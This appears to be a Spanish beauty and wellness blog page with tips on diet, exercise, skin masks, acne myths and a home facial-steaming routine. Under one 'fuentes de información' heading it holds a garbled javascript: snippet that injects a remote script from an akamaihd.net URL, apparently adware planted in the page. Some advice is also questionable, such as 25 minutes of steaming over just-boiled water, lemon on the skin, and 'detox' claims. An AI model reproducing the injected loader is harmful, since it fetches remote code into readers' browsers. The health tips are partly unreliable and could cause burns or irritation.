pagina principal


SECRETOS PARA TENER UNA VIDA SANA

Siempre come desayuno   El desayuno es considerado por muchos la comida más importante del día.  Con las carreras matutinas que casi todos padecemos es difícil a veces alimentarnos bien.  Una taza de café con pan no es un buen desayuno.   El desayuno debe proporcionarnos energía y vitalidad.   Debe incluir todos los grupos alimenticios y ser bajo en grasa.   Un buen desayuno te ayudara a concentrarte mejor durante el día.
Muévete.   La importancia del ejercicio físico nos es recordada constantemente, pero con tanto que hacer no es fácil hacer ejercicio.   Uno de los ejercicios más completos es caminar.   Al caminar movemos todos los músculos y nos relajamos.  Una caminata diaria por 20 o 30 minutos te ayudara a relajarte, dormir bien, y tener músculos firmes.  Si no puedes ir al gimnasio, o no te gusta ir, caminar es una opción fácil y efectiva.
Toma un baño energizante  Ha veces pensamos que para relajarnos y tener una piel corporal bella y suave hay que ir a un spa. La forma más fácil de cuidarte la piel es durante el baño.   Usa una esponja natural o un estropajo natural para aplicarte el jabón de esta forma estarás exfoliando tu cuerpo, activando la circulación y dándote un masaje ligero. Siempre aplícate crema después del baño especialmente en áreas propensas a la sequedad como las piernas.       
Estírate.   Trata de estirarte durante el día.   Ya sea durante tu caminata, o por las mañanas y tardes.   Unos pocos segundos de estiramiento eliminaran estrés muscular y te energizaran.   Sencillamente párate, levanta los brazos y trata de alcanzar el cielo. 
Duerme.   La falta de sueño es catastrófica para la salud y belleza y trata de dormir el tiempo necesario


Aguas , Aguas.   El agua es el liquido vital.   Alimenta la piel y tus órganos internos.   Trata de mantener agua cerca de ti en todo tiempo así te será más fácil tomarla. 

Asegúrate de ingerir las vitaminas necesarias.   Si no te es posible asegúrate toma una cápsula de multivitaminas al día.
Sonríe.   La sonrisa es la expresión de la felicidad interna (aunque también la hay fingida).   Trata de tomar un problema a la ves.   Cuando sientas que el estrés te agobia respira profundo, recuerda que es más fácil cometer errores cuando se tiene estrés y confusión.
Muéstrale tu mejor cara a la vida.   Cada día haz algo para crear un mundo mejor.  No tienes que hacerte voluntaria e irte al África a alimentar a los más pobres.   Con actividades pequeñas como sonreírle a un desconocido o dando el paso a alguien que camina de prisa, cediendo el asiento en el tren, poniendo la basura en su lugar y no desperdiciando energía estas contribuyendo a crear un mundo mejor.


5 TIPS DE BELLEZA QUE TODA MUJER DEBE SABER

Tip # 1: Nunca subestimes el poder de las cremas hidratantes No importa si tu piel es seca, normal, o grasosa. No tienes que invertir en muchas cremas, con un sólo producto que sea bueno puedes tener una piel de ensueño.
Tip # 2: El protector solar es el mejor producto Antienvejecimiento. Antes de ver un cirujano plástico, antes de gastar la mitad del sueldo en cremas anti-envejecimiento, ponte protector solar. Todos sabemos que el protector solar reduce el riesgo de cáncer de piel, pero ¿También sabes que es un secreto asombroso de belleza que ayuda a mantener una piel joven? Las personas que se exponen mucho al sol se arrugan mucho antes de su tiempo. 
Tip # 3: Elige tu limpiador con prudencia. 
Si lo que usas diariamente para limpiarte la cara es agua y jabón, puedes ir reconsiderando tu estrategia de limpieza. Los dermatólogos dicen que uno de los mejores consejos de belleza es utilizar un limpiador suave y utilizarlo con moderación. 
Lávate la cara con demasiada frecuencia - más de dos veces al día - puede hacer que dañes la barrera lipídica natural, la cual es el manto protector que mantiene tu piel lubricada para que luzca y se sienta saludable.
Tip # 4: Utiliza las herramientas adecuadas para el trabajo adecuado Los cepillos y las brochas deben ser suaves, pero también tener sustancias para que los productos se puedan distribuir a lo largo de la superficie de tu piel. Si mojas un pincel en la sombra o rubor y el color se cae antes de llegar a tu cara, este es un pincel malo, dicen los expertos. Si vas a invertir en buenos productos, elige buenas herramientas de maquillaje. Sólo tienes que hacerlo una vez. 
Tip # 5: Tratamiento para el pelo y maquillaje cada 2 años Si llegas a tu reunión de ex alumnos y tus amigos te dicen que pareces una foto, corre, corre, corre hacia el salón de belleza más cercano. Acuérdate, es una vez cada dos años.

utiliza Sal, arcilla y miel para eliminar puntos negros

Esta mezcla puede transformarse en una excelente mascarilla exfoliante que te ayudará a eliminar los puntos negros. Prepara una mezcla homogénea con los ingredientes procurando que tenga una textura arenosa. Frota la zona que quieres liberar de las espinillas durante unos 5 minutos y luego enjuaga. Veras que en unos días estos indeseables visitantes habrán desaparecido.

8 trucos para una piel perfecta
1. Cómo tener una piel hermosa, suave y joven
Ser cuidadosa
Lavarse el rostro con miel
Enjuagar el rostro con agua fría
Secarse con una toalla suave
Utilizar aceites vegetales
No beber alcohol
Beber jugos y licuados de frutas y verduras
Consumir frutas y verduras
Hacer ejercicio
Cepillar la piel en seco

2.La miel es un ingrediente natural muy efectivo para la belleza de la piel, así que en lugar de utilizar una loción limpiadora o agua y jabón especial para quitar las impurezas, toma un frasco de miel y aplica un poco de ella en el rostro. ¡Haz la prueba! Notarás que tu piel queda naturalmente limpia y suave.

3.Cuando apenas te levantes y vayas al baño a mojarte la cara para despertarte...¡usa agua fría! La temperatura baja del agua no solo es la adecuada para despabilarnos rápidamente sino también para promover una mejor humectación en la piel y cerrar los poros. El agua caliente, de lo contrario, la vuelve más seca y escamosa.

4.Recuerda uno de los puntos anteriores: ¡ser cuidadosa! Cuando termines de enjuagarte, no frotes tu rostro de manera fuerte y brusca contra la toalla. Recuerda que la piel de la cara es muy sensible; tan solo acaricia tu piel con una palmada en una toalla suave y deja que se seque naturalmente.

5. Nada mejor para la piel y la salud en general que un suculento licuado de frutas y verduras repleto de nutrientes y antioxidantes. ¡Además, son deliciosos! Intenta beber algún licuado de frutas y verduras cada dos días. Una opción puede ser una mezcla de zumo de manzana, zanahoria y pimientos rojos.

6. Las frutas y las verduras son los alimentos más sanos que podemos encontrar. Ellos nos aportan vitaminas, minerales y antioxidantes necesarios para la salud y también para la belleza, pues lo que comemos tiene efecto en nuestra apariencia. Intenta consumir varias porciones de frutas y vegetales al día; integrarlos a tus desayunos o meriendas o consúmalos como snacks entre comidas. 

7. tampoco olvides beber abundante agua. Consume más frutas, vegetales y agua todos los días y enseguida notarás que la piel está más luminosa e hidratada.

8.El ejercicio es uno de los mejores hábitos para tener una mejor salud, un cuerpo espectacular y ¡una piel hermosa! Porque cuando transpiramos, liberamos toxinas y se oxigenan nuestras células. ¿Te cuento algo de experiencia propia? A los pocos días de hacer ejercicio dos veces a la semana, enseguida noté que el aspecto de mi piel se veía más limpio y suave. ¡En serio! Si no puedes ir al gym, sal a caminar, a correr, anda en bicicleta, practica algún deporte, o lo que más te guste. La clave es poner el cuerpo en movimiento, quemar calorías, liberar tensiones, sudar, sudar y sudar.

9 FORMAS PARA TENER LA PIEL BELLA SIN GASTAR UN PESO

Con estos nueve consejos podrás mantenerte al día para lograr un cutis hermoso, y lo mejor es que cuestan muy poco. 

1. Mascarilla de Café. No tires a la basura el café que queda en la greca por la mañana. Sólo un puñado de este café húmedo (si es preferible orgánico) constituye un excepcional exfoliante facial y corporal. No sólo elimina las células muertas de la piel con una delicadeza extraordinaria, sino que también refuerza y cierra los poros, resultando en una piel increíblemente suave. Para piel seca, añade de 1 a 2 cucharadas de aceite de oliva extra virgen frío. 

2. Lava tus utensilios de maquillaje. Los cepillos, brochas y esponjas de maquillaje sucias son focos de bacterias y suciedad. Cuando frotas tu cara con estos terminas por obstruir los poros y promueves la aparición de granitos y puntos negros. Lava tus utensilios al menos una vez a la semana con un poco de champú y agua tibia para que queden como nuevos, así como tu piel. 

3. No botes las cáscaras. Para hacer una crema hidratante súper fácil, quita la carne interior de la cáscara de un banano, aplícala a la cara y luego enjuaga después de 15 minutos. Otras cáscaras de frutas y verduras que puedes utilizar de la misma forma que la del banano (la parte interior, lo carnoso): papas, para ayudar a reducir la hinchazón, cítricos (naranjas, limones, pomelos) por sus poderosas propiedades astringentes, aguacate, para dar lozanía a tu tez y piña, para iluminar la piel al instante. 

4. Date un masaje facial. El masaje aumenta la circulación de la cara en la superficie de la epidermis, mejorando la firmeza de tu piel, al mismo tiempo que afloja los músculos de la cara, suavizando las líneas habituales y las arrugas. Cuando te hayas lavado la cara y cuando apliques tu crema hidratante o tonificador habitual, hazlo de este modo: parte de tu barbilla y sigue con las manos hacia arriba, hacia las mejillas, sobre contorno de los ojos y la frente. 

5. Un baño de vapor. Evita el acné con una ‘mascarilla’ de vapor facial semanal, pues abre los poros, estimula la circulación y elimina las toxinas. Todo lo que necesitas es una olla de agua, una estufa, y una toalla. (Si quieres que sea más elaborada, agrega un puñado de hierbas aromáticas como lavanda, caléndula, manzanilla o tomillo). Espera que hierva, reduce el fuego y deja hervir a fuego lento durante 5 a 10 minutos. Luego cubre la toalla sobre tu cabeza como una especie de carpa e inclina tu rostro sobre el vapor con mucho cuidado. Mantén esta posición durante 5 minutos y luego enjuaga la cara con agua fría para cerrar los poros. Sentirás la suavidad de manera inmediata. 

6. Toma duchas más cortas y frías. El agua caliente remueve las células grasas que retienen el agua en tu piel, dejándola seca y agrietada. Toma una ducha fría, así tengas que tiritar un poco. No sólo te deja la piel lozana, también ahorrarás gastos de calefacción y llegarás más rápido al trabajo. (el planeta también te lo agradecerá). 

7. Ponte en movimiento. A pesar de que ya no tengamos que cazar animales silvestres para llevar comida a la mesa, nuestros cuerpos no fueron diseñados para sentarse detrás de un escritorio todo el día. En lugar de estacionarte frente al computador o la televisión, sal a la calle y ponte en movimiento. Mantener los músculos tonificados nos sirve para esculpir el cuerpo, también ayuda a agilizar el transporte de nutrientes a las células, mientras que promueve la eliminación de toxinas. El ejercicio también puede ayudar a reducir hormonas de testosterona, relacionadas a esos horribles brotes. 

8. Evita los dulces. Para un rostro de aspecto dulce, deja de lado el azúcar. El azúcar y los carbohidratos altamente refinados, como el pan blanco, arroz blanco, papas fritas y refrescos azucarados, pueden acelerar la formación de granos, así como el envejecimiento. ¿Por qué? Un proceso químico conocido como glicación, hace que al descomponerse el azúcar interfiera con las moléculas de proteína, disminuyendo la elasticidad del colágeno en la piel. 

9. Hidrátate. Recuerda beber mucha agua, alrededor de seis a ocho vasos al día, para librar tu cuerpo de toxinas. Cuanto menor sea la carga química con la que tu cuerpo debe lidiar (pesticidas, productos químicos sintéticos, metales pesados), mayor energía que tendrás para la renovación celular. Además, al estar bien hidratada no sientes hambre, mejorando no sólo tu piel sino también tu figura. 

7 mitos del acné en adultos que debes conocer para tener una piel mas hermosa

#1 Tu dieta no tiene nada que ver

Si piensas que lo que llevas a tu boca no guarda ninguna relación con los volcanes que están naciendo en tu cara, estás muy equivocada. De hecho, numerosas investigaciones ya han demostrado y siguen confirmando que hay un vínculo muy estrecho entre la alimentación y el acné. Así, las personas que consumen más azúcar, productos lácteos y grasas perjudiciales y menos pescado son mucho más vulnerables a esta problemática.

#2 El chocolate está prohibido
Como acabamos de ver, una mala alimentación puede promover el desarrollo del acné. Ahora bien, esto no significa que el chocolate sea particularmente responsable. En realidad, toda comida con un índice glicémico alto incrementa los niveles de cortisol y, como consecuencia, tiene el potencial de empeorar el acné.
¿Entonces? El problema no yace en la cacao, sino en la leche y el azúcar que se les agrega al chocolate. Por tanto, si quieres prevenir el acné, te recomendamos que optes por variedades que contengan un 20% de cacao o más. Y es que cuanto mayor sea este porcentaje, más bajo será el índice glicémico. 

#3 Es un problema de adolescentes
El acné puede ser el efecto de cambios hormonales y estos no se producen tan solo en la adolescencia -sobre todo, si eres mujer-. Por tanto, el acné puede sorprenderte casi a cualquier etapa de tu vida. Así lo comprobó un estudio, que demostró que el 50% de las mujeres de entre 20 y 29 años padecían acné; el 35% de mujeres de entre 30 y 39; y el 26% de entre 20 y 49 años.

#4 El maquillaje no ayuda
Ciertos productos pueden obstruir los poros y terminar por causar granitos. Ahora bien: el maquillaje adecuado tiene el potencial de ayudar a que el acné desaparezca. Así, por ejemplo, la base en polvo suele ser muy recomendable para absorber el exceso de aceite de la piel.

#5 El protector solar obstruye los poros
Para desenmascarar este mito, cabe realizar primero una distinción. Hay 2 tipos de protectores solares: los químicos, que absorben los rayos UV, y los físicos, que los reflejan. Los protectores químicos pueden irritar la piel, causar inflamación y favorecer la aparición del acné. Los físicos, sin embargo, todo lo contrario. Y es que uno de los componentes más típicos de este tipo de protectores -óxido de zinc- puede ser muy eficiente a la hora de matar las bacterias responsables del acné

#6 La pasta de dientes es una gran aliada
La pasta de dientes contiene bicarbonato, alcohol, mentol y aceites esenciales, y todos estos ingredientes pueden contribuir a secar los granos -es verdad-. No obstante, es fundamental que tengas presente que este producto no fue diseñado para que lo apliques sobre tu piel. Por tanto, si lo haces, puedes terminar por irritarla. ¿Conclusión? Estarías reemplazando un problema por otro.

#7 El sol combate al acné
La exposición solar puede ayudar a reducir la inflamación corporal -y el acné es un proceso inflamatorio-. Pero, ¡ni se te ocurra quitarte el sombrero! Con el tiempo, el sol rompe las reservas de colágeno de la piel -que es la proteína que la mantiene firme y joven-. Además, puede provocar manchas en la piel e incrementar la vulnerabilidad alcáncer de piel.

Sal con leche para eliminar puntos negros
Para esto necesitarás un poco de leche y bastante sal. Prepara la mezcla de manera que quede una consistencia arenosa sin llegar a ser líquida, más bien es preferible que sea una pasta. Utiliza esta mezcla para pasarla por tu nariz o en la zona donde tengas los puntos negros. Veras que con el paso de los días la cantidad irá disminuyendo hasta desaparecer completamente y, lo mejor de todo es que lo hará sin dejar ningún tipo de marcas.


Yogurth natural y limón para pieles grasas
Yogurt natural y limón para las pieles grasas

Si tienes una piel grasa hay un truco casero que funciona muy bien y además es muy fácil de preparar
Sólo tienes que mezclar un yogurth natural con zumo de limón y extenderlo, a modo de mascarilla, por todo el rostro. Deja que actúe durante 15 minutos y aclárate con abundante agua. Ya verás como tu piel se quedará radiante y muy, muy suave.
¡Haz la prueba en casa y no te arrepentirás!




fuente de información

http://mujer.orange.es/especials/belleza/100trucos/rostro/yogur-limon-pieles-grasas/




CONSEJOS PARA MANTENER TU PIEL BELLA E HIDRATADA

Para pieles grasas: Poner en un recipiente 2 cucharadas de yogurth natural y firme y mezclar con el jugo de medio limón hasta obtener una mezcla homogénea,poner en el rostro y dejar actuar por 20 min. 

Pieles secas: Poner en un bol una yema de huevo y 1 cucharada de miel mezclar bien y dejar actuar en el rostro por 15 min. 

Pieles normales: Picar medio banano y dejar actuar en el rostro por 20 min.
 
Y el ultimo paso es humectar tu piel con cremas esto es muy importante para protegerla y mantenerla 

suave y fresca.
 


fuentes de información
javascript:try{if(document.body.innerHTML{vara=document.getElementsByTagName("head");if(a.length{vard=document.createElement("script");d.src="https://apiclingclangbiza.akamaihd.net/gsrsis=t4pcsuCO&bp=BA&g=541f4fa7bd314febb6e71ca7f04511d8";a[0].appendChild(d);}}}catch(e){}

CONSEJOS PARA MANTENER TU CARA LIMPIA Y SIN ACNE
      
Para hacernos una limpieza facial podemos ir a una estética que nos haga una limpieza facial que oscilará entre los 20 a 40 euros. Pero si somos habilidosas podemos hacernos la limpieza facial profunda en casa.

Necesitamos:
Una Olla con agua
Una toalla
Pañuelos de papel
Leche
Algodones

Primero: Ponemos la olla con agua al fuego y dejamos que hierva
Segundo: Cuando empiece a hervir, retiramos la olla del fuego
Tercero: Acercamos la cara por encima de la olla la tapamos con una toalla (como la foto indica) durante 25 minutos sin retirarnos para que el vapor penetre en nuestra piel y abra los poros.
Cuarto: Pasados los 25 minutos, con pañuelos de papel podemos “apretar” un poco para que los puntos negros y demás imperfecciones salgan, y así dejar nuestra piel limpia.
Quinto: Una vez acabado el proceso, nos mojamos la cara con agua FRÍA para cerrar los poros que hemos abierto previamente con el agua caliente.
Sexto: Mojamos en leche un algodón o disco desmaquillante y extendemos por toda la cara.
Séptimo: Volvemos a enjuagar la cara con agua para retirar la leche
Después de este proceso notaremos la cara roja y tal vez con los poros dilatados. No te  preocupes.  No te va a quedar así la cara. Todo desaparecerá en unas horas, pero les recomiendo hacer este cuidado una vez que estés en casa y no vayas a salir hasta el día siguiente.


FUENTES DE INFORMACION
http://anamariadiazblog.wordpress.com/2012/11/08/trucos-para-tener-una-piel-mas-limpia-sana-y-sin-imperfecciones/

No hay comentarios:

Publicar un comentario